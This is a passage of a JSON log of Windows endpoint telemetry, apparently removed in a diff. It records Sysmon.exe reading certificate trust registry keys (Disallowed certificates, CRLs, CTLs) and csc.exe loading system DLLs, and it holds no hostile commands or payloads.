"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860110000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 